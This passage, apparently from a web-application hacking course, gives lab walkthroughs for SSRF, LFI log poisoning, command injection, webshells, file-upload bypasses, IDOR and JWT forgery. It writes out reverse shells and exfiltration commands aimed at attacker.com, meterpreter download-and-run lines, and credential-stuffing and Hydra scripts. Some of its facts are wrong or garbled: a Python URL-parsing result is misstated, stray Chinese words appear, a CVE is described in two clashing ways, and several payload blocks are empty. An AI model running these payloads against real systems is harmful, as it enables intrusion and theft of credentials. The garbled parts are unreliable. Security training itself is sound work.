buckets:\n\n```bash\naws configure set aws_access_key_id AKIA...\naws configure set aws_secret_access_key ...\naws s3 ls\n```\n\n**Expected output:** AWS credentials and S3 bucket listing\n\n\n\nSolution\n\n**Bypass technique:** The whitelist check was:\n```python\nif url.startswith(\"http://stock.weliketoshop.net\"):\n # allow\n```\n\nBut URL parsing in Python:\n```python\nfrom urllib.parse import urlparse\nurlparse(\"http://stock.weliketoshop.net@127.0.0.1/\")\n# Netloc: stock.weliketoshop.net@127.0.0.1\n# Hostname: stock.weliketoshop.net\n```\n\nThe `@` separates userinfo from host. The hostname is `stock.weliketoshop.net` (passes whitelist), but the actual target is `127.0.0.1`.\n\n**Full exploit in Repeater:**\n```\nPOST /product/stock HTTP/1.1\nHost: ace11.example.com\nstockApi=http://stock.weliketoshop.net@127.0.0.1/latest/meta-data/iam/security-credentials/\n```\n\nResponse contains: `AwsInstanceRole` with `AccessKeyId`, `SecretAccessKey`, `Token`.\n\n\n\n---\n\n## Exercise 8: LFI to RCE via Log Poisoning\n\n**Objective:** Exploit LFI to gain shell access via Apache access log poisoning.\n\n**Setup:** Target has LFI at `http://target.com/index.php?page=`. Apache log at `/var/log/apache2/access.log` is accessible.\n\n**Steps:**\n1. Verify LFI is accessible:\n```\nGET /index.php?page=../../../../etc/passwd\n\u2192 Returns /etc/passwd content\n```\n\n2. Confirm log location (try common paths):\n```\nGET /index.php?page=../../../../var/log/apache2/access.log\n\u2192 Returns log content with User-Agent, IPs, timestamps\n```\n\n3. Inject PHP payload via User-Agent header:\n```bash\ncurl -A \"\" http://target.com/\n```\n\n4. Verify injection in log:\n```\nGET /index.php?page=../../../../var/log/apache2/access.log\n\u2192 Should see your User-Agent containing PHP code\n```\n\n5. Execute commands:\n```\nGET /index.php?page=../../../../var/log/apache2/access.log&cmd=whoami\n\u2192 root\n```\n\n6. Get reverse shell:\n```\nGET /index.php?page=../../../../var/log/apache2/access.log&cmd=bash -i >& /dev/tcp/attacker.com/4444 0>&1\n```\n\n7. On attacker box:\n```bash\nnc -lvnp 4444\n\u2192 Shell connection established\n```\n\n**Expected output:** Interactive shell as www-data\n\n\n\nSolution\n\n**Step-by-step verification:**\n\n1. **LFI test:**\n```\nGET /index.php?page=../../../../etc/passwd\nHTTP/1.1 200 OK\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n...\n```\n\n2. **Log poisoning:**\n```bash\n$ curl -A \"\" http://target.com/\n```\n\n3. **Verify in log:**\n```\nGET /index.php?page=../../../../var/log/apache2/access.log\n...\n127.0.0.1 - - [14/Jun/2026:10:00:00 +0000] \"GET / HTTP/1.1\" 200 1234 \"-\" \"\"\n```\n\n4. **RCE:**\n```\nGET /index.php?page=../../../../var/log/apache2/access.log&cmd=id\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n```\n\n5. **Upgrade to meterpreter:**\n```bash\n# On attacker\nmsfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=attacker.com LPORT=4444 -f elf > shell.elf\npython3 -m http.server 8080\n# Target: curl http://attacker.com:8080/shell.elf -o /tmp/shell.elf && chmod +x /tmp/shell.elf && /tmp/shell.elf\n```\n\n\n\n---\n\n## Summary Table\n\n| Lesson | Topic | Key Technique | Impact |\n|--------|-------|--------------|--------|\n| 16 | SSRF | URL fetch to internal services | Read AWS creds, internal port scan |\n| 17 | Path Traversal | `../` in file paths | Read any readable file |\n| 18 | LFI | Include local files via wrappers | LFI to RCE via log/session poisoning |\n| 19 | RFI | Include remote PHP files | Direct RCE |\n| 20 | XXE | External entity in XML | File read, SSRF, DoS |\n\n---\n\n## Quick Reference: SSRF Filter Bypass Cheat Sheet\n\n| Bypass | Payload |\n|--------|---------|\n| localhost | `localhost` |\n| IPv4 | `127.0.0.1`, `127.1`, `2130706433` |\n| IPv6 | `[::1]`, `[0:0:0:0:0:0:0:1]` |\n| DNS rebinding | `attacker.com` \u2192 A points to 127.0.0.1 |\n| URL parsing | `http://localhost@127.0.0.1/` |\n| Overlong UTF-8 | `0x7f000001` \u2192 `127.0.0.1` |\n| URL encode | `%32%37%2e%30%2e%30%2e%31` |\n\n---\n\n**Next Module:** Command Injection, File Upload vulnerabilities, and IDOR. We'll cover webshell deployment and privilege escalation via direct object references.\n\n\n\n\n# Module 5: Command Injection, File Upload, Race Conditions, IDOR\n\n## Lesson 21: Command Injection\n\n### What is Command Injection?\n\nCommand injection occurs when user input is passed to system shell functions (system(), exec(), shell_exec(), popen(), proc_open()) without proper sanitization. The attacker injects shell metacharacters to execute arbitrary commands.\n\n**Why it matters:**\n- Direct OS command execution on the server\n- Root/Administrator access in many cases\n- Full server takeover\n- Lateral movement to other systems\n\n### Vulnerable Code Patterns\n\n**PHP:**\n```php\n// DANGEROUS\nsystem(\"ping \" . $_GET['host']);\nexec(\"nslookup \" . $_GET['host']);\nshell_exec(\"ping -c 3 \" . $_GET['host']);\npopen(\"ping -c 3 \" . $_GET['host'], \"r\");\nproc_open(\"ping -c 3 \" . $_GET['host'], $descriptors, $pipes);\n```\n\n**Python:**\n```python\n# DANGEROUS\nimport os\nos.system(f\"ping -c 3 {request.args.get('host')}\")\nsubprocess.call(f\"ping -c 3 {request.args.get('host')}\", shell=True)\n```\n\n**Node.js:**\n```javascript\n// DANGEROUS\nconst { exec } = require('child_process');\nexec(`ping -c 3 ${req.query.host}`);\n```\n\n### Shell Metacharacters\n\n| Metacharacter | Purpose | Example |\n|--------------|---------|---------|\n| `;` | Command separator | `; whoami` |\n| `\\|` | Pipe output | `\\| whoami` |\n| `&` | Background + separator | `& whoami` |\n| `&&` | Run if previous succeeds | `&& whoami` |\n| `\\|\\|` | Run if previous fails | `\\|\\| whoami` |\n| `` ` `` | Command substitution | `` `whoami` `` |\n| `$()` | Command substitution | `$(whoami)` |\n| `>` | Redirect output | `> /etc/passwd` |\n| `<` | Input redirect | `< /etc/passwd` |\n| `\\n` | Newline (newline injection) | `%0a whoami` |\n\n### Command Injection Payloads\n\n**Basic detection:**\n```\n; whoami\n| whoami\n& whoami\n&& whoami\n`whoami`\n$(whoami)\n\\nwhoami\n```\n\n**Blind command injection (no output):**\n```\n; sleep 5\n| sleep 5\n& sleep 5\n&& sleep 5\n|| sleep 5\n```\n\n**File operations:**\n```\n; cat /etc/passwd\n| head /etc/passwd\n& type /etc/passwd (Windows)\n```\n\n**Out-of-band exfiltration:**\n```\n; curl http://attacker.com/$(whoami)\n; wget http://attacker.com/?x=$(cat /etc/passwd)\n```\n\n### Time-Based Blind Detection\n\n**MySQL/PostgreSQL:**\n```\n; SELECT pg_sleep(5)--\n; SLEEP(5)--\n```\n\n**Testing in Burp:**\n1. Find the command injection parameter\n2. Inject: `; sleep 5`\n3. If response takes ~5 seconds \u2192 confirmed\n4. For exploitation, use DNS exfiltration or reverse shell\n\n### PortSwigger Lab: Command Injection in Ping Feature\n\n**Lab:** Stock check feature executes ping command. Goal: read `/etc/passwd`.\n\n**Vulnerable request:**\n```\nPOST /product/stock\nstockApi=127.0.0.1\n```\n\nServer executes: `ping -c 3 127.0.0.1`\n\n**Step 1: Detect command injection**\n```\nPOST /product/stock\nstockApi=127.0.0.1; whoami\n```\n\nIf response contains `www-data` or command output \u2192 confirmed.\n\n**Step 2: Read file via command substitution**\n```\nPOST /product/stock\nstockApi=127.0.0.1; cat /etc/passwd\n```\n\n**Step 3: Alternative \u2014 command substitution**\n```\nPOST /product/stock\nstockApi=127.0.0.1$(cat /etc/passwd)\n```\n\n**Step 4: If semicolons blocked, try newlines**\n```\nPOST /product/stock\nstockApi=127.0.0.1%0Acat%20/etc/passwd\n```\n\n**Step 5: Reverse shell**\n```\nPOST /product/stock\nstockApi=127.0.0.1; bash -i >& /dev/tcp/attacker.com/4444 0>&1\n```\n\n### Real-World: Shellshock (CVE-2014-6271)\n\nThe `() { :; };` pattern in User-Agent or other headers:\n```bash\ncurl -A \"() { :; }; /bin/bash -c 'whoami'\" http://target.com/cgi-bin/status\n```\n\n### Remediation\n\n**NEVER pass user input to shell functions:**\n```php\n// SAFE: Use parameterized approach\n$host = escapeshellarg($_GET['host']);\nsystem(\"ping -c 3 \" . $host);\n```\n\n```python\n# SAFE: Don't use shell=True\nimport subprocess\nresult = subprocess.run([\"ping\", \"-c\", \"3\", host], capture_output=True, text=True)\n```\n\n---\n\n## Lesson 22: File Upload Vulnerabilities\n\n### What is File Upload?\n\nWeb applications that accept file uploads (profile pictures, document uploads, attachments) without proper validation are a primary attack surface. A successful upload can lead to RCE.\n\n**Why it matters:**\n- Direct path to Remote Code Execution\n- Uploaded files often executable by web server\n- Bypassing authentication\n- Serving malware to other users\n\n### Vulnerable Code\n\n```php\n\n```\n\nNo validation. Any file type accepted.\n\n### Extension Bypass\n\n**Blacklist bypass (block .php but not .php5, etc.):**\n```\nshell.php \u2192 blocked\nshell.php5 \u2192 accepted\nshell.phtml \u2192 accepted\nshell.phar \u2192 accepted\nshell.php4 \u2192 accepted\nshell.php3 \u2192 accepted\n```\n\n**Case variation:**\n```\nshell.PhP\nshell.PHP\nshell.pHP\n```\n\n**Double extension:**\n```\nshell.jpg.php\nshell.php.jpg\nshell.php.png\n```\n\n**Null byte (old PHP):**\n```\nshell.php%00.jpg\n```\nThe `%00` truncates, saving as `shell.php`.\n\n**ASP/IIS:**\n```\nshell.asp\nshell.aspx\nshell.asa\nshell.htw (Windows)\n```\n\n**Apache MIME type tricks:**\n```\nAddType application/x-httpd-php .pwn\n```\n\n### Content-Type Validation Bypass\n\n**Vulnerable check:**\n```php\nif ($_FILES[\"file\"][\"type\"] == \"image/jpeg\") {\n // accept\n}\n```\n\n**Bypass:** Intercept the upload request in Burp and change:\n```\nContent-Type: application/x-php\n```\nto:\n```\nContent-Type: image/jpeg\n```\n\n### Polyglot Files (JPEG+PHP)\n\nA valid JPEG image with PHP code appended:\n```bash\n# Create polyglot: valid JPEG header + PHP code\necho -e '\\xFF\\xD8\\xFF\\xE0\\x00\\x10JFIF\\x00\\x01\\x01\\x00\\x00\\x01\\x00\\x01\\x00\\x00\\xFF\\xD9' > shell.jpg\necho '' >> shell.jpg\n```\n\nOr use `exiftool`:\n```bash\nexiftool -Comment='' image.jpg -o shell.jpg\n```\n\nUpload `shell.jpg` \u2014 server sees it as image, but PHP engine may still parse ` shell.gif\ncat shell.php >> shell.gif\n```\n\nUpload as `shell.gif`, access as `shell.gif.php`.\n\n### Image Upload Bypass: Pixel\u6d2a\u6c34\n\nFor strict content-type + magic byte validation, embed PHP in EXIF data:\n```bash\nexiftool -Comment='' photo.jpg\n```\n\nIf the server reads EXIF metadata for display but doesn't sanitize output, the PHP code in EXIF gets executed.\n\n---\n\n## Lesson 23: Webshell Basics\n\n### What is a Webshell?\n\nA webshell is a piece of code (PHP/ASP/JSP) that provides command execution capabilities through a web interface. After uploading, the attacker accesses it via HTTP to run commands.\n\n### Basic PHP Webshell\n\n**One-liner:**\n```php\n\n```\n\n**POST variant (less visible in logs):**\n```php\n\n```\n\n**Usage:**\n```\nGET /uploads/shell.php?cmd=whoami\nPOST /uploads/shell.php with body: x=whoami\n```\n\n### Feature-Rich Webshell\n\n```php\n\";\n $cmd =($_REQUEST['cmd']);\n system($cmd);\n echo \"\";\n}\nif(isset($_REQUEST['x'])){\n eval($_REQUEST['x']);\n}\n?>\n```\n\n### The Essential Toolkit\n\n**PentesterMonkey (PHP):**\n```php\n\"; system($_GET['cmd']); echo \"\";\n?>\n```\n\n**Weevely (Python-generated PHP):**\n```bash\n# Generate\nweevely generate password123 /tmp/shell.php\n\n# Connect\nweevely http://target.com/uploads/shell.php password123\n# Gives interactive shell\n```\n\n**meterpreter PHP payload:**\n```bash\nmsfvenom -p php/meterpreter/reverse_tcp LHOST=attacker.com LPORT=4444 -o shell.php\n```\n\n### Webshell Obfuscation\n\n**Base64:**\n```php\n\n```\nWhere the base64 decodes to: `system($_GET['cmd']);`\n\n**Hex:**\n```php\n\n```\n\n**String concatenation:**\n```php\n\n```\n\n** ROT13:**\n```php\n\n```\n\n### Webshell Detection\n\n**Look for:**\n```php\nsystem()\nexec()\nshell_exec()\npassthru()\npopen()\nproc_open()\nproc_close()\npcntl_exec()\nassert()\npreg_replace() with /e modifier\ncreate_function()\ncall_user_func()\ncall_user_func_array()\n```\n\n**Log files to check:**\n```\n/var/log/apache2/access.log\n/var/log/nginx/access.log\n/var/log/httpd/error_log\n```\n\n### Cobalt Strike Webscript\n\n```php\n\n```\n\n---\n\n## Lesson 24: Race Conditions\n\n### What is a Race Condition?\n\nA race condition (TOCTOU \u2014 Time-of-check to Time-of-use) occurs when the security check and the operation use the same resource at different times. An attacker can exploit the gap between check and use.\n\n**Classic scenario:**\n1. Upload check: file looks clean\n2. Between check and save: file is swapped\n3. File saved: malicious version stored\n\n### Race Condition in File Upload\n\n```php\n\n```\n\nBetween step 1 and 3, attacker could swap the file.\n\n**Exploitation:**\n```python\nimport requests\nimport threading\n\nurl = \"http://target.com/upload\"\nevil = open(\"shell.php\", \"rb\")\n\ndef upload():\n while True:\n files = {'file': evil}\n r = requests.post(url, files=files)\n\nthreads = [threading.Thread(target=upload) for _ in range(50)]\nfor t in threads:\n t.start()\n```\n\n### CSV Injection (Formula Injection)\n\nUpload a CSV file containing formulas:\n```csv\nName,Email,Amount\nJohn,john@example.com,=SUM(1,2)\n\"=CMD|' /C calc'!A0\",\"a@b.com\",\"100\"\n```\n\nWhen opened in Excel/Google Sheets:\n- `=SUM(1,2)` executes as formula\n- `=CMD|...` attempts to execute system commands\n\n**Real impact:** When a bank processes uploaded CSV containing:\n```\nAmount\n=IMPORTHTML(\"http://evil.com/malicious.html\",\"table\",0)\n```\nThis could potentially leak data or execute commands.\n\n### HMAC Race Condition\n\nIf a signature is checked, then the operation uses the raw data:\n```python\n# Check\nif verify_hmac(signature, data):\n # Use\n process(data)\n```\nBetween check and use, `data` could be changed.\n\n### Concurrent Request Exploitation\n\n**Rate limit bypass:**\n```python\n# 100 concurrent requests to endpoint with rate limit of 10/minute\n# Each request appears to come from different session\n```\n\n**OTP race condition:**\n```python\n# OTP verified, then reused\n# Attacker sends 1000 OTP guesses simultaneously\n# One will match before the server invalidates it\n```\n\n---\n\n## Lesson 25: IDOR (Insecure Direct Object Reference)\n\n### What is IDOR?\n\nIDOR occurs when an application exposes internal object references (IDs, filenames, keys) and doesn't verify the user's authorization to access that object. The reference is direct, not through a proper access control mechanism.\n\n**Why it matters:**\n- Horizontal privilege escalation (access other users' data)\n- Vertical privilege escalation (access admin data)\n- Found in almost every web application\n- High impact: GDPR violations, financial exposure\n\n### Examples\n\n**URL-based IDOR:**\n```\nGET /invoice?num=1001 \u2192 Your invoice\nGET /invoice?num=1002 \u2192 Another user's invoice\n```\n\n**API-based IDOR:**\n```\nGET /api/profile/1 \u2192 Your profile\nGET /api/profile/2 \u2192 Another user's profile\n```\n\n**Cookie-based IDOR:**\n```\nCookie: user_id=1 \u2192 Your account\nCookie: user_id=2 \u2192 Another user's account\n```\n\n**Filename-based IDOR:**\n```\nGET /download?file=report.pdf \u2192 Your report\nGET /download?file=../../etc/passwd \u2192 System file\n```\n\n### Finding IDOR\n\n**Step 1: Map all resource references**\n- Numeric IDs: `/user/1`, `/order/123`, `/product/456`\n- UUIDs: `/api/abc123-def456`\n- Filenames: `/download?file=report.pdf`\n\n**Step 2: Enumerate**\n```python\nfor i in range(1, 1000):\n r = requests.get(f\"/api/profile/{i}\", cookies=session)\n if r.status_code == 200:\n print(f\"Found profile {i}\")\n```\n\n**Step 3: Test authorization boundary**\n- Your resource at `/api/profile/1`\n- Try `/api/profile/2`, `/api/profile/3`\n- If you see another user's data \u2192 IDOR confirmed\n\n### Real-World Bug Bounty: Facebook IDOR\n\n**Vulnerability:** When downloading your Facebook data, the download link was:\n```\nhttps://www.facebook.com/ajax/lookahead/ads_archive_download?token=ABC123\n```\n\nThe `token` was a simple token without proper user binding. An attacker could:\n1. Request their own data download\n2. Intercept the download URL\n3. Share that URL with others (anyone could download)\n\n**Fix:** Bind download tokens to user sessions + short expiration.\n\n### Horizontal vs Vertical Escalation\n\n**Horizontal:** Access resources at the same privilege level\n```\nGET /api/users/2/profile \u2192 You are user 1, viewing user 2's profile\nBoth are regular users. Same privilege level.\n```\n\n**Vertical:** Access resources at higher privilege level\n```\nGET /api/admin/users \u2192 Regular user accessing admin endpoint\nGET /api/admin/settings \u2192 Regular user accessing admin settings\n```\n\n### Mass Assignment (Hidden Parameter Manipulation)\n\n**Scenario:** User profile edit form has:\n```html\n\n\n\n\n```\n\n**Exploitation:** In Burp, change:\n```\nis_admin=false \u2192 is_admin=true\n```\n\nOr remove the parameter entirely, or add it if not present.\n\n### IDOR in Password Reset\n\n**Flow:**\n1. User requests password reset \u2192 `POST /reset` with `email=user@target.com`\n2. Email sent with reset link: `http://target.com/reset?token=ABC123&user_id=1`\n3. Token is predictable or reused\n4. Attacker changes `user_id=2` \u2192 resets admin's password\n\n**Real bug:** Twitter password reset (CVE-2022-32209):\n- Sequential tokens\n- Attacker could reset any user's password\n\n### Preventing IDOR\n\n**Always authorize:**\n```python\ndef get_profile(request, user_id):\n # Fetch the requested profile\n profile = Profile.objects.get(id=user_id)\n # CRITICAL: Verify authorization\n if request.user.id != profile.id and not request.user.is_admin:\n raise PermissionDenied()\n return profile\n```\n\n**Use indirect references:**\n```python\n# Instead of: /api/profile/123\n# Use: /api/profile?ref=abc123xyz (random, non-sequential)\n```\n\n**Bind to session:**\n```python\n# Every resource access checks session\nif resource.user_id != request.session['user_id']:\n raise PermissionDenied()\n```\n\n---\n\n## Exercise 9: Command Injection to Reverse Shell\n\n**Objective:** Exploit command injection in a ping feature to gain a reverse shell.\n\n**Lab:** PortSwigger \"OS command injection\"\n\n**Steps:**\n1. Find the ping feature at `/product/stock`\n2. In Burp Repeater, test command injection:\n```\nPOST /product/stock\nstockApi=127.0.0.1; whoami\n```\nResponse shows `www-data`\n\n3. Start netcat listener on attacker box:\n```bash\nnc -lvnp 4444\n```\n\n4. Inject reverse shell:\n```\nPOST /product/stock\nstockApi=127.0.0.1; bash -i >& /dev/tcp/attacker.com/4444 0>&1\n```\n\n5. Verify shell:\n```bash\nwhoami\n# www-data\nid\n# uid=33(www-data) gid=33(www-data)\n```\n\n6. Upgrade to meterpreter:\n```bash\n# In the shell\ncurl http://attacker.com:8080/shell.elf -o /tmp/shell.elf && chmod +x /tmp/shell.elf && /tmp/shell.elf\n```\n\n\n\nSolution\n\n**Full exploit chain:**\n\n1. **Setup listener:**\n```bash\nnc -lvnp 4444\n```\n\n2. **Inject (URL encoded):**\n```\nPOST /product/stock HTTP/1.1\nHost: ac061f81.example.com\nContent-Type: application/x-www-form-urlencoded\n\nstockApi=127.0.0.1%26%20bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fattacker.com%2F4444%200%3E%261\n```\n\n3. **Or using semicolon:**\n```\nstockApi=127.0.0.1; bash -i >& /dev/tcp/attacker.com/4444 0>&1\n```\n\n4. **Confirm:**\n```\n# On netcat listener:\nwww-data@server:/var/www/html$\n```\n\n5. **Stabilize:**\n```bash\npython3 -c 'import pty; pty.spawn(\"/bin/bash\")'\nCtrl+Z # Background shell\nstty raw -echo; fg # Bring back to foreground\nexport TERM=xterm\n```\n\n\n\n---\n\n## Exercise 10: IDOR to Access Admin Panel\n\n**Objective:** Find and exploit IDOR to access the admin panel without authentication.\n\n**Lab:** PortSwigger \"IDOR vulnerability with direct reference to hidden admin panel\"\n\n**Steps:**\n1. Log in as a regular user (wiener:peter)\n2. Browse the application normally\n3. In Burp Proxy history, look for references to admin pages:\n - `/admin`\n - `/admin/users`\n - `/admin/roles`\n - `/admin/logs`\n4. Try accessing `/admin` directly as regular user \u2192 401 Unauthorized\n5. Look for API endpoints that list resources:\n - `/api/orders`\n - `/api/profile`\n6. Notice the URL pattern: `/api/profile/1` (your user ID)\n7. Change to `/api/profile/2` or `/api/profile/3`\n8. If admin user is ID 2: `/api/profile/2` returns admin data\n9. Escalate: Find admin-only endpoints:\n - `/admin/delete?userId=1`\n - `/admin/roles?userId=2`\n10. Use IDOR to perform admin actions as a regular user\n\n\n\nSolution\n\n**Step-by-step:**\n\n1. **Login as wiener:**\n```\nPOST /login\nusername=wiener&password=peter\n\u2192 Cookie: session=abc123\n```\n\n2. **View your profile:**\n```\nGET /api/profile/1\n\u2192 {\"id\":1,\"username\":\"wiener\",\"role\":\"user\"}\n```\n\n3. **Enumerate user IDs:**\n```\nGET /api/profile/2\n\u2192 {\"id\":2,\"username\":\"administrator\",\"role\":\"admin\"}\n```\n\n4. **Admin panel access:**\n```\nGET /admin\n\u2192 401 Unauthorized (browser checks client-side)\n\nGET /admin\n\u2192 200 OK (Burp allows it \u2014 no server-side check)\n```\n\n5. **Admin action via IDOR:**\n```\nPOST /admin/delete HTTP/1.1\nCookie: session=abc123\nuserId=1\n\u2192 Deletes user 1 (wiener) \u2014 regular user action on another user\n```\n\nThe key insight: the server checks authentication but NOT authorization for some admin endpoints.\n\n\n\n---\n\n## Summary Table\n\n| Lesson | Topic | Key Technique | Impact |\n|--------|-------|--------------|--------|\n| 21 | Command Injection | Shell metacharacters | RCE on server |\n| 22 | File Upload | Extension/MIME bypass | Webshell upload |\n| 23 | Webshell | PHP/ASP/JSP shells | Persistent RCE |\n| 24 | Race Conditions | TOCTOU exploitation | Bypass checks, data leak |\n| 25 | IDOR | Direct object reference | Access other users' data |\n\n---\n\n## Quick Reference: File Upload Bypass Cheat Sheet\n\n| Bypass | Payload | Notes |\n|--------|---------|--------|\n| Double extension | `shell.php.jpg` | .jpg passes MIME check |\n| Case variation | `shell.PhP` | Case-insensitive IIS |\n| Null byte | `shell.php%00.jpg` | Truncates in old PHP |\n| IIS\u7279\u6b8a | `shell.asp;`, `shell.php;` | Semicolon parsing |\n| Apache | `shell.php.jpg.jpg` | mod_php sees last .php |\n| MIME type | Change Content-Type header | No file content check |\n| Polyglot | Valid JPEG header + PHP | GIF89a trick |\n| EXIF | PHP in metadata | exiftool injection |\n\n---\n\n**Next Module:** Authentication Flaws, JWT Attacks, and Session Management. We'll cover credential stuffing, password reset flaws, and JWT manipulation.\n\n\n# Module 6: Authentication Flaws, JWT Attacks, Session Management\n\n## Lesson 26: Authentication Fundamentals\n\n### How Authentication Works\n\n**Three factors:**\n1. **Something you know** \u2014 Password, PIN, security question\n2. **Something you have** \u2014 Phone (OTP), hardware token, smart card\n3. **Something you are** \u2014 Fingerprint, face, iris\n\n**Best practice:** Multi-factor (2FA/MFA) combining two different factors.\n\n### Authentication vs Authorization\n\n- **Authentication:** Who are you? (Login)\n- **Authorization:** What can you access? (Permissions)\n\nIDOR is an authorization flaw. This module is about authentication flaws.\n\n### Common Authentication Mechanisms\n\n**Session-based (traditional):**\n```\n1. User submits credentials\n2. Server validates \u2192 creates session record\n3. Server returns session ID (Set-Cookie)\n4. Client sends session ID with every request\n5. Server looks up session \u2192 identifies user\n```\n\n**Token-based (JWT):**\n```\n1. User submits credentials\n2. Server validates \u2192 generates signed token\n3. Server returns token\n4. Client sends token with every request\n5. Server verifies signature \u2192 identifies user\n```\n\n**API Key-based:**\n```\n1. User includes API key in header: X-API-Key: abc123\n2. Server validates key \u2192 identifies user\n```\n\n### Common Password Storage\n\n**Insecure:**\n```php\n// DANGEROUS: Plain text or MD5\n$password = $_POST['password'];\n```\n\n**Better:**\n```php\n// MD5 (still bad \u2014 rainbow tables)\n$hash = md5($password);\n```\n\n**Good:**\n```php\n// bcrypt (adaptive cost)\n$hash = password_hash($password, PASSWORD_BCRYPT);\n```\n\n**Best:**\n```php\n// Argon2i (modern, memory-hard)\n$hash = password_hash($password, PASSWORD_ARGON2ID);\n```\n\n---\n\n## Lesson 27: Broken Authentication\n\n### Credential Stuffing\n\nUsing stolen credentials from data breaches to log into other services. People reuse passwords.\n\n**Why it works:** 60%+ of people reuse passwords.\n\n**Automation:**\n```python\nimport requests\n\ncredentials = [\n (\"user1@example.com\", \"password123\"),\n (\"admin@target.com\", \"password123\"),\n (\"user@target.com\", \"target2019\"),\n]\n\nfor email, password in credentials:\n r = requests.post(\"https://target.com/login\", \n data={\"email\": email, \"password\": password})\n if \"Welcome\" in r.text:\n print(f\"SUCCESS: {email}:{password}\")\n```\n\n**Protection:** Rate limiting, CAPTCHA, device fingerprinting, 2FA.\n\n### Brute Force\n\nGuessing passwords through automated enumeration.\n\n**Weak vs strong protection:**\n| Protection | Bypass |\n|-----------|--------|\n| No protection | 1000 guesses/second |\n| Account lockout | Lock after 5 failures \u2192 DoS users |\n| CAPTCHA | Can be defeated with ML |\n| IP block | Rotate IPs, use proxies |\n| Progressive delay | 1s, 2s, 4s, 8s... \u2192 10^6 guesses takes years |\n\n**Hydra (HTTP Basic Auth):**\n```bash\nhydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form \"/login:username=^USER^&password=^PASS^:Invalid\"\n```\n\n**Hydra (HTTP Digest):**\n```bash\nhydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-get \"/admin:F=Failed\"\n```\n\n### Password Reset Flaws\n\n**1. Token predictable/sequential:**\n```python\n# DANGEROUS: Token is user ID + timestamp\ntoken = hashlib.md5(f\"{user_id}{datetime.now().timestamp()}\".encode())\n# Attacker can generate valid tokens for any user\n```\n\n**2. Token not bound to user session:**\n```\nUser A requests reset for user B\nToken sent to user A's email\nBut token works for user B's account\n```\n\n**3. Email injection in reset:**\n```\nEmail: victim@target.com%0a%0dBcc: attacker@evil.com\n```\nInjecting newlines can add BCC field \u2192 token sent to attacker too.\n\n**4. Password reset via GET:**\n```\nGET /reset?token=ABC123&password=newpass123\nToken visible in logs, referrer, browser history\n```\n\n**5. Null byte in token:**\n```\ntoken=ABC123%00\n```\nMay bypass token comparison (string truncation).\n\n### Real-World: Twitter Password Reset (CVE-2022-32209)\n\n**Vulnerability:** Password reset token was a JWT with `none` algorithm.\n**Impact:** Any user could reset any other user's password.\n\n**Exploitation:**\n```python\nimport jwt\n\n# Create token with alg: none\ntoken = jwt.encode(\n {\"user_id\": 123456789, \"alg\": \"none\"},\n \"\", # No secret\n algorithm=\"none\"\n)\n# Send password reset with this token\n```\n\n### Session Fixation\n\n**Attack:**\n1. Attacker visits target site \u2192 gets session ID: `abc123`\n2. Attacker tricks victim into using `abc123` (via link: `http://target.com/?session=abc123`)\n3. Victim logs in with `abc123`\n4. Attacker uses `abc123` \u2192 authenticated as victim\n\n**Protection:** Regenerate session ID after login.\n\n---\n\n## Lesson 28: JWT (JSON Web Token) Attacks\n\n### JWT Structure\n\nA JWT has three parts separated by dots:\n```\neyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIn0.abc123signature\n```\n\n**Decoded:**\n```\nHeader: {\"alg\":\"HS256\",\"typ\":\"JWT\"}\nPayload: {\"user_id\":1,\"username\":\"admin\",\"role\":\"admin\"}\nSignature: abc123signature\n```\n\n**Header + Payload are base64-encoded (readable).**\n\n### JWT vs JWS vs JWE\n\n- **JWT** (JSON Web Token) \u2014 the standard\n- **JWS** (JSON Web Signature) \u2014 signed JWT (what we usually call JWT)\n- **JWE** (JSON Web Encryption) \u2014 encrypted JWT\n\nMost web apps use JWS (signed, not encrypted).\n\n### HS256 vs RS256\n\n**HS256 (HMAC with SHA-256):**\n- Symmetric key: same key for signing AND verifying\n- Key must be kept secret\n- Used when server controls both sides\n\n**RS256 (RSA with SHA-256):**\n- Asymmetric: private key signs, public key verifies\n- Public key can be shared\n- Used in OAuth/OIDC\n\n### Common JWT Vulnerabilities\n\n**1. Algorithm None (`alg: none`):**\n```json\n{\"alg\": \"none\", \"typ\": \"JWT\"}\n```\nNo signature verification. Attacker modifies payload, sets alg to none.\n\n**2. Key Confusion (HS256 \u2192 RS256):**\n```\n# Server uses RS256 (public key to verify)\n# But HS256 uses symmetric secret\n# If server accepts HS256 with RS256's public key as secret:\n```\nAttacker signs with HS256 using the public key as the secret.\n\n**3. Weak Secret:**\n```python\n# Brutable secret\nsecret = \"secret\" # or \"1234\", \"password\", \"admin\"\n```\n```bash\n# Cracking with hashcat or jwt_tool\nhashcat -m 16500 jwt.txt wordlist.txt\njwt_tool.py -C -d wordlist.txt -X -t \"jwt.txt\"\n```\n\n**4. No signature verification:**\n```\n# Server trusts any token with valid structure\n# Doesn't verify signature at all\n```\n\n**5.Kid (Key ID) injection:**\n```json\n{\"alg\": \"HS256\", \"kid\": \"../../../etc/passwd\"}\n```\nIf `kid` is used to load the key from filesystem without sanitization.\n\n### JWT Attack Lab: PortSwigger\n\n**Lab:** JWT authentication bypass via algorithm confusion.\n\n**Setup:** Target uses RS256. Goal: access admin panel as admin.\n\n**Step 1: Get the public key**\n```\nGET /jwk\n\u2192 {\"kty\":\"RSA\",\"n\":\"...\",\"e\":\"AQAB\"}\n```\n\n**Step 2: Use jwt_tool to perform attack:**\n```bash\npython3 jwt_tool.py eyJhbGciOiJSUzI1NiJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6InBpbmUiLCJyb2xlIjoidXNlciJ9.abc123 -X -k publickey.pem\n```\n\n**Step 3: Modify payload:**\n```python\nimport jwt\n\n# Original token (user, not admin)\noriginal = \"eyJhbGciOiJSUzI1NiJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6InBpbmUiLCJyb2xlIjoidXNlciJ9.abc123\"\n\n# With public key as secret (key confusion attack)\nmodified = jwt.encode(\n {\"user_id\": 1, \"username\": \"peter\", \"role\": \"admin\"},\n open(\"publickey.pem\").read(),\n algorithm=\"HS256\"\n)\n```\n\n**Step 4: Use modified token:**\n```\nGET /admin 